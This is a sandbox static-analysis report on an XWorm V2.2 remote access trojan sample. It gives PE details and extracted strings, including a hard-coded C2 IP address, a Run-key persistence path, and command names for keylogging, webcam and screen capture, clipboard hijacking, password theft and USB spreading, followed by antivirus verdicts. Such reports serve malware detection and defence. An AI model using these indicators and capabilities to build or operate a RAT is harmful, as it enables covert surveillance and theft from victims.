Static | ZeroBOX

PE Compile Time

2023-12-08 06:22:32

PE Imphash

f34d5f2d4577ed6d9ceec516c1f5a744

Sections

| Name | Virtual Address | Virtual Size | Size of Raw Data | Entropy |
|---|---|---|---|---|
| .text | 0x00002000 | 0x00009884 | 0x00009a00 | 5.62727554152 |
| .rsrc | 0x0000c000 | 0x000004e8 | 0x00000600 | 3.7548730747 |
| .reloc | 0x0000e000 | 0x0000000c | 0x00000200 | 0.0815394123432 |

Resources

| Name | Offset | Size | Language | Sub-language | File type |
|---|---|---|---|---|---|
| RT_VERSION | 0x0000c0a0 | 0x00000254 | LANG_NEUTRAL | SUBLANG_NEUTRAL | data |
| RT_MANIFEST | 0x0000c2f8 | 0x000001ea | LANG_NEUTRAL | SUBLANG_NEUTRAL | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators |

Imports

Library mscoree.dll:
0x402000 _CorExeMain

Strings

!This program cannot be run in DOS mode.
`.rsrc
@.reloc
  (y
v4.0.30319
#Strings
<Module>
mscorlib
Microsoft.VisualBasic
MyApplication
MyComputer
MyProject
MyWebServices
ThreadSafeObjectProvider`1
Settings
ClientSocket
Messages
Helper
RemoteDesktop
AppendOutputTextDelegate
Microsoft.VisualBasic.ApplicationServices
ApplicationBase
Microsoft.VisualBasic.Devices
Computer
System
Object
.cctor
get_Computer
m_ComputerObjectProvider
get_Application
m_AppObjectProvider
get_User
m_UserObjectProvider
get_WebServices
m_MyWebServicesObjectProvider
Application
WebServices
Equals
GetHashCode
GetType
ToString
Create__Instance__
instance
Dispose__Instance__
get_GetInstance
m_ThreadStaticValue
GetInstance
Mutexx
System.Threading
_appMutex
current
isConnected
System.Net.Sockets
Socket
BufferLength
BufferLengthReceived
Buffer
System.IO
MemoryStream
ManualResetEvent
allDone
SendSync
BeginConnect
IAsyncResult
BeginReceive
BeginRead
EndSend
isDisconnected
System.Diagnostics
Process
_MyProcess
get_MyProcess
set_MyProcess
WithEventsValue
processid
AppendOutputText
DataReceivedEventArgs
MyProcess_ErrorDataReceived
sender
MyProcess_OutputDataReceived
WSound
mouse_event
dwFlags
cButtons
dwExtraInfo
user32
keybd_event
Thread
capCreateCaptureWindowA
lpszWindowName
dwStyle
nWidth
nHeight
hwndParent
Handle
capGetDriverDescriptionA
wDriver
lpszName
cbName
lpszVer
getFolders
location
getFiles
getDrives
Download
MyProcess
GetHashT
strToHash
frombase64
Plugin
AES_Encryptor
AES_Decryptor
INDATE
Comment
Antivirus
CreateMutex
CloseMutex
userAgents
IPHOST
PortHost
IsValid
Address
BitBlt
nXDest
nYDest
hdcSrc
gdi32.dll
System.Drawing
Capture
System.Drawing.Imaging
ImageCodecInfo
GetEncoderInfo
MulticastDelegate
TargetObject
TargetMethod
AsyncCallback
BeginInvoke
DelegateCallback
DelegateAsyncState
EndInvoke
DelegateAsyncResult
Invoke
System.ComponentModel
EditorBrowsableAttribute
EditorBrowsableState
System.CodeDom.Compiler
GeneratedCodeAttribute
DebuggerHiddenAttribute
Microsoft.VisualBasic.CompilerServices
StandardModuleAttribute
HideModuleNameAttribute
System.ComponentModel.Design
HelpKeywordAttribute
System.Runtime.CompilerServices
RuntimeHelpers
GetObjectValue
RuntimeTypeHandle
GetTypeFromHandle
Activator
CreateInstance
MyGroupCollectionAttribute
System.Runtime.InteropServices
ComVisibleAttribute
ThreadStaticAttribute
CompilerGeneratedAttribute
GetCurrentProcess
ProcessModule
get_MainModule
get_FileName
VB$AnonymousDelegate_0
_Lambda$__1
DebuggerDisplayAttribute
FileInfo
Exception
Environment
SpecialFolder
GetFolderPath
GetFileName
String
Concat
FileSystemInfo
FileAttributes
set_Attributes
ProjectData
SetProjectError
ClearProjectError
Interaction
Environ
ServerComputer
Microsoft.VisualBasic.MyServices
RegistryProxy
get_Registry
Microsoft.Win32
RegistryKey
get_CurrentUser
OpenSubKey
GetFileNameWithoutExtension
SetValue
ThreadStart
Random
WaitHandle
WaitOne
STAThreadAttribute
_Lambda$__2
_Lambda$__3
DebuggerStepThroughAttribute
TimerCallback
AddressFamily
SocketType
ProtocolType
set_ReceiveBufferSize
set_SendBufferSize
Conversions
ToInteger
Connect
SocketFlags
EventWaitHandle
ComputerInfo
get_UserName
get_OSFullName
Replace
OperatingSystem
get_OSVersion
get_ServicePack
get_Is64BitOperatingSystem
Boolean
EndReceive
ToArray
ToLong
Stream
Dispose
WriteByte
get_Length
WaitCallback
ThreadPool
QueueUserWorkItem
ObjectFlowControl
CheckForSyncLockOnValueType
Monitor
SelectMode
BeginSend
IDisposable
Collect
_Closure$__1
$VB$Local_A
_Lambda$__6
_Lambda$__4
_Lambda$__5
DataReceivedEventHandler
remove_OutputDataReceived
remove_ErrorDataReceived
add_OutputDataReceived
add_ErrorDataReceived
Operators
AddObject
get_Data
System.Net
WebClient
StreamWriter
Bitmap
FileAttribute
Rectangle
ProcessStartInfo
DateTime
System.Collections
IEnumerator
Strings
CompareMethod
CompareString
System.Windows.Forms
Restart
SocketShutdown
Shutdown
NewLateBinding
LateCall
ChangeType
Screen
get_PrimaryScreen
get_Bounds
get_Size
ConcatenateObject
LateGet
Cursor
set_Position
Convert
ToBoolean
ToByte
UIntPtr
GetTempFileName
DownloadFile
CreateObject
LateSet
AppWinStyle
ToInt32
Exists
get_StartInfo
set_FileName
set_Arguments
set_UseShellExecute
set_RedirectStandardError
set_RedirectStandardOutput
set_CreateNoWindow
WaitForExit
set_RedirectStandardInput
get_Id
BeginErrorReadLine
BeginOutputReadLine
get_StartTime
get_StandardInput
TextWriter
WriteLine
GetProcesses
get_ProcessName
GetExtension
GetProcessById
Delete
Directory
FileSystemProxy
get_FileSystem
RenameDirectory
RenameFile
ReadAllText
GetThumbnailImageAbort
IntPtr
GetThumbnailImage
ImageFormat
get_Png
FileSystem
SetAttr
CreateDirectory
FileStream
Create
ReadAllBytes
ToBase64String
WriteAllBytes
GetTempPath
CopyDirectory
MoveDirectory
get_Audio
Registry
GetValue
IEnumerable
GetEnumerator
get_Current
MoveNext
Network
get_Network
MessageBox
DialogResult
UploadFile
DirectoryInfo
GetDirectories
get_Name
GetFiles
DriveInfo
System.Collections.Generic
IEnumerator`1
DriveType
System.Collections.ObjectModel
ReadOnlyCollection`1
get_Drives
get_DriveType
DllImportAttribute
avicap32.dll
user32.dll
AccessedThroughPropertyAttribute
MarshalAsAttribute
UnmanagedType
_Lambda$__7
System.Text
Encoding
get_Default
GetBytes
GetString
get_ProcessorCount
get_MachineName
get_SystemDirectory
GetPathRoot
get_TotalSize
System.Security.Cryptography
MD5CryptoServiceProvider
StringBuilder
get_ASCII
HashAlgorithm
ComputeHash
Append
Substring
ToUpper
FromBase64String
System.Reflection
Module
Assembly
GetModules
GetTypes
get_FullName
EndsWith
get_Assembly
RijndaelManaged
ICryptoTransform
SymmetricAlgorithm
set_Key
CipherMode
set_Mode
CreateEncryptor
TransformFinalBlock
CreateDecryptor
get_LastWriteTime
System.Security.Principal
WindowsIdentity
GetCurrent
WindowsPrincipal
WindowsBuiltInRole
IsInRole
System.Management
ManagementObjectSearcher
ManagementBaseObject
ManagementObjectCollection
ManagementObjectEnumerator
get_Item
get_DnsSafeHost
get_UTF8
EncoderParameter
EncoderParameters
Graphics
get_Width
get_Height
FromImage
FromHwnd
GetHdc
ReleaseHdc
Cursors
get_Position
op_Inequality
Encoder
Quality
get_Param
GetImageEncoders
get_MimeType
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
GuidAttribute
AssemblyFileVersionAttribute
AssemblyTrademarkAttribute
AssemblyCopyrightAttribute
AssemblyProductAttribute
AssemblyCompanyAttribute
AssemblyDescriptionAttribute
AssemblyTitleAttribute
XWormClient
XWormClient.exe
MyTemplate
14.0.0.0
My.Computer
My.Application
My.User
My.WebServices
4System.Web.Services.Protocols.SoapHttpClientProtocol
Create__Instance__
Dispose__Instance__
<generated method>
<generated method>
MyProcess
WrapNonExceptionThrows
$8676214c-4828-4352-be17-a645bff0d60a
1.0.0.0
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
89.23.99.86
<123456789>
<Xwormmm>
USB.exe
9sFhtscMLr74lMX9
appdata
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Microsoft
Service Pack
XWorm V2.2
Error:
uninstall
update
Height
Memory
getinfo
openhide
internetexplorer.application
navigate
visible
shellfuc
regfuc
WScript.Shell
RegWrite
REG_DWORD
RunBotKiller
script
Cilpper
Clipper
injRun
startusb
startsp
PSleep
PreventSleep
taskkill.exe
/pid
CMD.EXE
Process Started at:
runnnnnn
closeshell
GetText
setText
clearr
BScreen
GetDrives
FileManager
Delete
Folder
Execute
Rename
txtttt
viewimage
hidefolderfile
showfolderfile
creatnewfolder
creatfile
downloadfile
downloadedfile
sendfileto
install
NETINS
7zip\7z.exe
InsProg
RSSDis
GETWCamPlu
GETWmicPlu
Wsound
GETWsoundPlu
JustFun
MapsPLU
closeKL
HKEY_CURRENT_USER\SOFTWARE\
GETTCP
GetActiveWindows
killAct
InstallN
InstallngC
\ngrok.exe
Getpass
Pvbnet
Emails
Error!
LLCHAT
[Folder]
FileManagerSplitFileManagerSplit
FileManagerSplit
[Drive]
Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
Err HWID
Class1
dd/MM/yyy
Nothing
\root\SecurityCenter2
Select * from AntivirusProduct
displayName
POST / HTTP/1.1
Host:
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
User-Agent:
Content-length: 5235
image/jpeg
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
1.0.0.0
InternalName
XWormClient.exe
LegalCopyright
OriginalFilename
XWormClient.exe
ProductVersion
1.0.0.0
Assembly Version
1.0.0.0
Antivirus Signature
Bkav W32.AIDetectMalware.CS
Lionic Trojan.Win32.XWorm.j!c
Elastic Windows.Trojan.Xworm
DrWeb Trojan.MulDrop20.21028
MicroWorld-eScan IL:Trojan.MSILZilla.30401
CMC Clean
CAT-QuickHeal Backdoor.MsilFC.S31068087
Skyhigh BehavesLike.Win32.Generic.pm
McAfee GenericRXUQ-KQ!C24FB9E28286
Malwarebytes Generic.Malware.AI.DDS
VIPRE IL:Trojan.MSILZilla.30401
Sangfor Trojan.Win32.Save.a
K7AntiVirus Trojan ( 00592e8b1 )
BitDefender IL:Trojan.MSILZilla.30401
K7GW Trojan ( 00592e8b1 )
Cybereason malicious.82124c
Arcabit IL:Trojan.MSILZilla.D76C1
BitDefenderTheta Gen:NN.ZemsilF.36608.cm0@aaiguXf
VirIT Trojan.Win32.MSIL_Heur.A
Symantec MSIL.XWorm!gen1
tehtris Clean
ESET-NOD32 a variant of MSIL/Agent.DWN
Cynet Malicious (score: 100)
APEX Malicious
Paloalto Clean
ClamAV Win.Packed.Msilzilla-10005608-0
Kaspersky HEUR:Trojan-Ransom.MSIL.Blocker.gen
Alibaba Trojan:Win32/CoinMiner.330b5069
NANO-Antivirus Trojan.Win32.Ransom.keybtv
ViRobot Trojan.Win.Z.Agent.41984.DXC
Rising Backdoor.XWorm!1.E1F9 (CLASSIC)
Sophos Mal/Vermis-X
F-Secure Trojan:W32/XwormRAT.A
Baidu Clean
Zillya Trojan.Agent.Win32.2900607
TrendMicro Backdoor.Win32.XWORM.YXDLHZ
Trapmine malicious.moderate.ml.score
FireEye Generic.mg.c24fb9e282869764
Emsisoft IL:Trojan.MSILZilla.30401 (B)
Ikarus Trojan.MSIL.Injector
Jiangmin Trojan.MSIL.aoysb
Webroot W32.Trojan.MSILZilla
Varist W32/MSIL_Ransom.D.gen!Eldorado
Avira HEUR/AGEN.1365768
MAX malware (ai score=85)
Antiy-AVL Trojan[Ransom]/MSIL.Blocker
Kingsoft malware.kb.c.1000
Gridinsoft Trojan.Win32.CoinMiner.sa
Xcitium Malware@#2m8jzj2wr2tle
Microsoft Trojan:Win32/CoinMiner!pz
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan-Ransom.MSIL.Blocker.gen
GData MSIL.Backdoor.SiRAT.A
Google Detected
AhnLab-V3 Trojan/Win.XWormRAT.C5120690
Acronis Clean
VBA32 Backdoor.MSIL.XWorm.gen
ALYac IL:Trojan.MSILZilla.30401
TACHYON Clean
DeepInstinct MALICIOUS
Cylance unsafe
Panda Trj/Chgt.AD
Zoner Clean
TrendMicro-HouseCall Backdoor.Win32.XWORM.YXDLHZ
Tencent Malware.Win32.Gencirc.10bf6bf1
Yandex Clean
SentinelOne Static AI - Malicious PE
MaxSecure Trojan.Malware.121218.susgen
Fortinet MSIL/Agent.DWN!tr
AVG Win32:MalwareX-gen [Trj]
Avast Win32:MalwareX-gen [Trj]
CrowdStrike win/malicious_confidence_100% (W)
No IRMA results available.